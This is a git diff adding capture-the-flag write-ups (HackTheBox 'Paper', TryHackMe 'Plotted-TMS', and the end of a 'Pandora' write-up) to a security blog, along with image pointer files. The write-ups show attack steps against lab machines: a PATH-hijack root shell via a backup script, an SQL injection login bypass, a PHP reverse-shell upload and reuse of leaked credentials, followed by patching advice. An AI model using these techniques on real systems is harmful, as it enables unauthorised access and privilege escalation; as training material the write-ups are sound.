>$(tty) 2>$(tty)" | at now; tail -f /dev/null +``` +![](img/image-10.webp) + +I will now be able to use the sudo command, but I don't have matt's password, I have to find another lever to get root. A second command that seemed interesting was: "pandora\_backup". Indeed a custom script and therefore with potential flaws. After downloading it locally, I extract the strings to try to see if I can recover some information from the : + + +```bash +strings pandora_backup +``` +We notice that the tar command is used to compress files in the root folder.  
But the call to tar does not use the full path, so we will be able to change the $PATH for a custom executable allowing us a privilege elevation. + +For that I create a "tar" file in the "tmp" folder, then I put the command /bin/sh inside. After adding the permissions on the file I can run the script : + + +```bash +cd /tmp && echo "/bin/sh" > tar && chmod 777 tar +export PATH=/tmp:$PATH +pandora_backup +``` +We now have a root shell and we can retrieve the last flag in the root folder: + +![](img/image-11.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not leave the SNMP port open to the outside +- Use SNMPv3 which is much more secure +- Update Pendora: the problem is patched in the latest version +- Do not use login/password in program execution commands +- Use public/private keys for SSH authentication diff --git a/content/writeup-ctf/writeup-paper-htb/featured.png b/content/writeup-ctf/writeup-paper-htb/featured.png new file mode 100644 index 0000000..318f61d --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0a6bb3a6471067523948b8a426f04f40aff1fba096d60e17119f99dc574b5bc1 +size 290842 diff --git a/content/writeup-ctf/writeup-paper-htb/featured.webp b/content/writeup-ctf/writeup-paper-htb/featured.webp new file mode 100644 index 0000000..e501ff9 --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e1ff11b4e4b60cea6dd70610fc839cb27626fa2c5b87892edd231b0b0fbcb981 +size 27460 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-1.png b/content/writeup-ctf/writeup-paper-htb/img/image-1.png new file mode 100644 index 0000000..19150e2 --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-1.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:644217a205d8274dc11bfede3dab1c49e7e4c4e3709e951515cdbe4f04a547a9 +size 54869 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-1.webp b/content/writeup-ctf/writeup-paper-htb/img/image-1.webp new file mode 100644 index 0000000..3131c0b --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:03e0069fa122527199f97fba8cdefd299dee126651cb4bbf01f189b82a970e45 +size 49232 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-10.png b/content/writeup-ctf/writeup-paper-htb/img/image-10.png new file mode 100644 index 0000000..2d3b26f --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2e581318e51a40e60e1cdb2037d67cab0382408f32b8286699529d2dbf464c53 +size 41840 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-10.webp b/content/writeup-ctf/writeup-paper-htb/img/image-10.webp new file mode 100644 index 0000000..f759bdd --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ef50d8b7faf37f21accb0c6cfdb16bef3b6c90fec75a41615d164a2aec9edb5b +size 33284 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-11.png b/content/writeup-ctf/writeup-paper-htb/img/image-11.png new file mode 100644 index 0000000..bbe3f13 --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e7aa536741003fec1e2242f8d42d77309db5925861b4449b53efb7c52ee8696b +size 16667 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-11.webp b/content/writeup-ctf/writeup-paper-htb/img/image-11.webp new file mode 100644 index 0000000..998386f --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-11.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a8ac9b032f2bb3afb7d6067a9c68d4efac3f7d849992bc736088778614954863 +size 15314 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-12.png b/content/writeup-ctf/writeup-paper-htb/img/image-12.png new file mode 100644 index 0000000..1afc825 --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1ff7794509b22fc4106299f8821d75bc7562c60125d919e7278c55b01313cba4 +size 95519 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-12.webp b/content/writeup-ctf/writeup-paper-htb/img/image-12.webp new file mode 100644 index 0000000..c0d8e54 --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d053dfb820ce384596fb4f2c61501396fdc8346b9ed4321cdf78257a0fd8266c +size 83378 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-13.png b/content/writeup-ctf/writeup-paper-htb/img/image-13.png new file mode 100644 index 0000000..78953ba --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0ee023e85449a98942d9df0b34ef84c709f9786c8e524666a12c53cdefe930bb +size 45714 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-13.webp b/content/writeup-ctf/writeup-paper-htb/img/image-13.webp new file mode 100644 index 0000000..13a001b --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-13.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a8ff10020029679217d2f7fa94dfa83c2b3fc39f2fe1dcb2e74d457f9f42bedd +size 42540 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-2.png b/content/writeup-ctf/writeup-paper-htb/img/image-2.png new file mode 100644 index 0000000..7f90a15 --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-2.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a0e02f6a11c2407d3ed5273ec1669b84d1341a8fb7aced1ee8022203d37ba742 +size 38803 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-2.webp b/content/writeup-ctf/writeup-paper-htb/img/image-2.webp new file mode 100644 index 0000000..2ef50ec --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:feba75693796bd3fffbe0cbcf02bc367c8e8aec1c9dda2ce6d37c1090935917c +size 33866 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-3.png b/content/writeup-ctf/writeup-paper-htb/img/image-3.png new file mode 100644 index 0000000..4efa036 --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:367e58b5cc6b5c4fe4b30c9c4fc12118b7e2993575c0d1b5f2085c48452a068a +size 2496230 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-3.webp b/content/writeup-ctf/writeup-paper-htb/img/image-3.webp new file mode 100644 index 0000000..824f94b --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:905cbf0e23b39052f427de04950db7750ffb94f9b8f62e5b2294d9eb63a199a9 +size 342674 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-4.png b/content/writeup-ctf/writeup-paper-htb/img/image-4.png new file mode 100644 index 0000000..6d55ddf --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3c6a2cbdb55ee1125c11c773063a3ffb6599e31d1c08629e42202283b07e21fc +size 106235 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-4.webp b/content/writeup-ctf/writeup-paper-htb/img/image-4.webp new file mode 100644 index 0000000..9262a5a --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-4.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:323cff4b6014ad1428931edde191879e71a699a4c729bf00fd827a51af07b08a +size 90746 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-5.png b/content/writeup-ctf/writeup-paper-htb/img/image-5.png new file mode 100644 index 0000000..94dfd6e --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:505a61661046b3a56e31741896554e753069f1156720b2dfe632b7dca4065dfd +size 27863 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-5.webp b/content/writeup-ctf/writeup-paper-htb/img/image-5.webp new file mode 100644 index 0000000..02d700d --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3d7228c533f31b269eca8dbb7ac59cebdbc26c823c1fd6ce4eea794f83417003 +size 19464 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-6.png b/content/writeup-ctf/writeup-paper-htb/img/image-6.png new file mode 100644 index 0000000..ac4163f --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ab9c4ab221b5fac615ddc49b6a80e731ae973c36b35096779011a7c1031dca18 +size 36775 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-6.webp b/content/writeup-ctf/writeup-paper-htb/img/image-6.webp new file mode 100644 index 0000000..2bb81f5 --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f205b5b475df89c440f4f3dee2deef78b9f5189c73f54672d66d81bf29978b47 +size 24208 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-7.png b/content/writeup-ctf/writeup-paper-htb/img/image-7.png new file mode 100644 index 0000000..97ac91d --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-7.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8963f78953916d3a24adc5c9b0f5ec94c82e593e313ae4138df81f7593f53c23 +size 68605 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-7.webp b/content/writeup-ctf/writeup-paper-htb/img/image-7.webp new file mode 100644 index 0000000..d64aec1 --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:db3c3b181814d604be85c4f2cb8695cc003ba37a27eee209269cff1ce3936b1a +size 68020 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-8.png b/content/writeup-ctf/writeup-paper-htb/img/image-8.png new file mode 100644 index 0000000..5024fda --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2fa46b3a77b267b76fbd6017bd51adf042b72e1aa82671bfb950e37870606dd4 +size 30141 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-8.webp b/content/writeup-ctf/writeup-paper-htb/img/image-8.webp new file mode 100644 index 0000000..db57a1c --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2be003818fb2d537528c48016d961025363a6eb3d313aecd0ee983ee3b8d8783 +size 30974 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-9.png b/content/writeup-ctf/writeup-paper-htb/img/image-9.png new file mode 100644 index 0000000..506b2ec --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ab77f01814c1f43538984659370197ffc4f109548bb1a012923e50b61c27c772 +size 83566 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-9.webp b/content/writeup-ctf/writeup-paper-htb/img/image-9.webp new file mode 100644 index 0000000..9532934 --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-9.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3220e151af2d7280e5ca9ba45e564c489f510b32e2967d9a2c5d62c065cb8e0e +size 76426 diff --git a/content/writeup-ctf/writeup-paper-htb/index.md b/content/writeup-ctf/writeup-paper-htb/index.md new file mode 100644 index 0000000..55cadfd --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/index.md 
@@ -0,0 +1,140 @@ +--- +title: "Writeup - Paper (HTB)" +date: 2022-04-05 +slug: "writeup-paper-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Paper](https://app.hackthebox.com/machines/Paper) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV 10.10.11.143 +``` +Three TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.2p1) +- 80/tcp : HTTP web server (Apache 2.4.37) +- 443/tcp : HTTPS web server (Apache 2.4.37) + +After checking the site via a web browser nothing is displayed, let's make a Curl request to see what the server sends us as a response: + +![](img/image-2.webp) + +We can see that the server accepts requests with the domain "office.paper", let's add this domain in our hosts file: + + +```bash +10.10.11.143 office.paper +``` +![](img/image-3.webp) + +We can now access the site, now let's look for exploits ! + +## Exploit + +After inspecting the page, I notice that it is a site based on the CMS Wordpress, let's do a scan with "WPScan" to try to identify flaws: + +![](img/image-4.webp) + +After some research, I realize that the version of Worpress used is vulnerable to [CVE-2019-17671](https://www.exploit-db.com/exploits/47690). + +Overall this exploit allows unidentified people to see normally private content. To do this we add the querry "?static=1" to the link of the site. This gives us access to a page with the following content: + + +``` + http://office.paper/?static=1 + + test + +Micheal please remove the secret from drafts for gods sake! + +Hello employees of Blunder Tiffin, + +Due to the orders from higher officials, every employee who were added to this blog is removed and they are migrated to our new chat system. + +So, I kindly request you all to take your discussions from the public blog to a more private chat system. 
+ +-Nick + +# Warning for Michael + +Michael, you have to stop putting secrets in the drafts. It is a huge security issue and you have to stop doing it. -Nick + +Threat Level Midnight + +A MOTION PICTURE SCREENPLAY, +WRITTEN AND DIRECTED BY +MICHAEL SCOTT + +[INT:DAY] + +Inside the FBI, Agent Michael Scarn sits with his feet up on his desk. His robotic butler Dwigt…. + +# Secret Registration URL of new Employee chat system + +http://chat.office.paper/register/8qozr226AhkCHZdyY + +# I am keeping this draft unpublished, as unpublished drafts cannot be accessed by outsiders. I am not that ignorant, Nick. + +# Also, stop looking at my drafts. Jeez! +``` +In this text one thing interests us the link "chat.office.paper", indeed it is a link allowing to register on an exchange platform used by the company having the site. I add the domain in my "hosts" file then I click on the link to create an account: + +![](img/image-5.webp) + +My account gives me access to several elements and in particular has a conversation with the various employees of the company. In this discussion we learn that dwight has created a bot that can interact with files. I start a private conversation with this bot and test some commands: + +![](img/image-6.webp) + +The output of the "listing" query is the same as for the "ls -l" command, interesting would it be possible to add a command afterwards so that the program interprets it? Unfortunately not, the bot detects the attempt as command injection and blocks it. No luck, let's try something else. + +Let's try to list another folder, for example the parent folder : + +![](img/image-7.webp) + +Bingo, we have the list of files from the parent folder to "dirty". I notice that a folder has the name of the bot, it must be its source code. In this folder we find a file ".env". This kind of folder contains environment variables and possibly crendential. + +![](img/image-8.webp) + +And yes, it does contain credentials! 
Let's try to use them to connect via SSH. No luck it doesn't work with the user "recyclops", but we know that it is "dwight" who created the bot, could he have used the same password for his account and the bot : let's try : + +![](img/image-9.webp) + +It works, we now have an SSH session with the user "dwight" and access to the first flag. + +## Privilege escalation + +I start by using the [linPeas](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) script to have a first list of exploits. For that I upload the file, I add the execution rights and I launch it: + +![](img/image-10.webp) + +After some analysis of the script result, I find that the machine is vulnerable to CVE-2021-3560. + +![](img/image-11.webp) + +Quickly I find this [script](https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation) which allows the exploitation and the creation of a root session. Unfortunately, after several tries, the script does not work. + +![](img/image-12.webp) + +Let's try another [script](https://github.com/Almorabea/Polkit-exploit) : + +![](img/image-13.webp) + +This time it works and create me a root session, I now have control of the machine and can recover the root flag. + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Update wordpress plugins +- Restricted access to the bot +- Do not leave credencials in an accessible file +- Generate unique credencials when creating a bot +- Upgrade linux to avoid old CVEs diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/featured.png b/content/writeup-ctf/writeup-plotted-tms-thm/featured.png new file mode 100644 index 0000000..5341cd4 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7c3a6bcefb12a891b4a21d25997d0960f184e1872bb6b73797f9bfbcb557ad3 +size 1785218 
diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/featured.webp b/content/writeup-ctf/writeup-plotted-tms-thm/featured.webp new file mode 100644 index 0000000..efca1da --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:50ba94222a8a082a52f10c3d4c07665389181450c13e1b25a0c5f068535139b1 +size 1975792 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-1.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-1.png new file mode 100644 index 0000000..a8cb422 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ffd30c97daa1a4f73e3946cb146ac854ed2352cb15d0c65649370d82d9ac12b5 +size 39447 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-1.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-1.webp new file mode 100644 index 0000000..1948829 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:262af0e573814ed86333702d2d49f3baaf0e61abac0c112d128ef024262f1ed5 +size 39904 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-10.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-10.png new file mode 100644 index 0000000..49d349e --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:361f69579143e453f97cc4dba3512ac682995e5df90ceed16a6b6926a9cd94c6 +size 4377 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-10.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-10.webp new file mode 100644 index 0000000..f6e0103 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-10.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5611b0b7826f69fa61f820944bc944d4b13b123b252f16082d5b8e247676a879 +size 7250 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-11.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-11.png new file mode 100644 index 0000000..48a03f2 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e2069dbb266b0fa0c166435a065270b06e1bb95b615a046d6e5564486874d116 +size 56346 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-11.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-11.webp new file mode 100644 index 0000000..69fc4ca --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bc8c8321bf432a5f77663bbea82634e98a9b884c80694af5be3d7622eca619bc +size 57872 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-2.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-2.png new file mode 100644 index 0000000..496f9c8 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:67ab94c4cd31a4c4e434c35a3b19f22fc402c8c133a84145852f967659fbe830 +size 58485 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-2.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-2.webp new file mode 100644 index 0000000..8c18e11 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:33e5a95ad01bd6c148cff1059ce0a1b32ee6cbd8caf3e7a8afdea1b6483e1cb5 +size 55894 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-3.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-3.png new file mode 100644 index 0000000..e263a14 --- /dev/null 
+++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bf8911cec2a1d04f9eeb89f477606b92141402cccc0c2943843c7819aa169066 +size 295536 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-3.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-3.webp new file mode 100644 index 0000000..2106317 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0612ea33b2f6a4aef315b6daa591b27d8b69660b6f258d479a6b6e710075fc05 +size 45986 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-4.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-4.png new file mode 100644 index 0000000..e412c2a --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9eea17bedb3dcb47323b4f1832bb63e4fa49f1fb83ecb0a1ba39a3511c456c0d +size 59817 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-4.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-4.webp new file mode 100644 index 0000000..cb14617 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0b6f9a13e13f05f98ff1df369e86e2c186369ccbc343529879f54f7fd12445a9 +size 30470 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-5.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-5.png new file mode 100644 index 0000000..07720bc --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a1aee28c30bf9cd2d5c125303402877cb58f0e632a55980d1cca542b248ca693 +size 29655 
diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-5.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-5.webp new file mode 100644 index 0000000..246e74d --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1b045f0c5ace374be09b3e594fce4cda809693a20180c4c4c4bbb511992338bc +size 9582 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-6.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-6.png new file mode 100644 index 0000000..37d9689 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6979ef1781496969bd2e39fcab2c8d7c805a3ed9e0484356b3ece74968854e52 +size 28550 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-6.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-6.webp new file mode 100644 index 0000000..cdf0e33 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:813f3c43c3ec797aa7649437b0b02c306bb61b1d3f36e81a1343061e86194d25 +size 25778 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-7.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-7.png new file mode 100644 index 0000000..df314ba --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dcdbd5727bcbf56a145ff5f83cd6c20b3d96e40f22faa6dba99837aa6838be59 +size 19464 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-7.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-7.webp new file mode 100644 index 0000000..43de3d4 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-7.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ab3e4ebaa88582b526afd1d1410f7e9cec6faa93b2d931ee59f179bba79ae788 +size 34576 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-8.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-8.png new file mode 100644 index 0000000..35b92b8 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3b65b05d6bb3622a66c585479ecc1ab7ac5b29f950b8e9ab87f3e3b76d8fa6d7 +size 7925 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-8.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-8.webp new file mode 100644 index 0000000..d1bf998 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f4804f06e65fa802bd249fcf7245fd3fb3c5eae0425347ad3a0dcc6836e7f561 +size 8794 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-9.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-9.png new file mode 100644 index 0000000..4bcb3f8 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6a25617f80d6432ab69532b2ea59f5e4e9c73aaa89eb0c18f45a96ef4f9c32d7 +size 17943 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-9.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-9.webp new file mode 100644 index 0000000..854ab70 --- /dev/null +++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:75736c62670dd4a98bdebc0ec77c420bdf7a35f7071e87290bc73a9af0f24c5e +size 18450 diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/index.md b/content/writeup-ctf/writeup-plotted-tms-thm/index.md new file mode 100644 index 0000000..9ea28a2 --- /dev/null 
+++ b/content/writeup-ctf/writeup-plotted-tms-thm/index.md 
@@ -0,0 +1,117 @@ +--- +title: "Writeup - Plotted-TMS (THM)" +date: 2022-03-31 +slug: "writeup-plotted-tms-thm" +type: "writeup-ctf" +--- + +This is a writeup for the [Plotted-TMS](https://tryhackme.com/room/plottedtms) machine from the TryHackMe site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.173.55 +``` +Three TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.2) +- 80/tcp : HTTP web server (Apache 2.4.41) +- 445/tcp : HTTP web server (Apache 2.4.41) + +## Exploit + +I start by listing the directories of the site hosted on port 445: + +![](img/image-2.webp) + +We find a `management` page that gives us access to an admin login page. + +![](img/image-3.webp) + +After a few injection tests I finally managed to connect with the following injection: + + +```bash +Username = ' or 1=1;-- - +``` +I now have access to the admin panel of the site. + +![](img/image-4.webp) + +In this panel I find the `Settings` page. This page allows to change the font image of the home page of the site. So I try to send a PHP reverse shell. + +![](img/image-5.webp) + +Then I access it via the following address: + + +```bash +http://10.10.173.55:445/management/uploads/ +``` +I now have a reverse shell with the user `www-data`. + +![](img/image-6.webp) + +After some research I find that the first flag is in the personal folder of the user `plot_admin`, problem I do not have the right to read it. So I will have to find a way to change the user. + +![](img/image-7.webp) + +After launching [linPeas](https://linpeas.sh) on the machine I find that every minute a script backup.sh is launched by the user `plot_admin`. + +![](img/image-8.webp) + +I don't have the permissions to change the content of the script, but I have the permissions to change the content of the `/var/www/scripts` folder. 
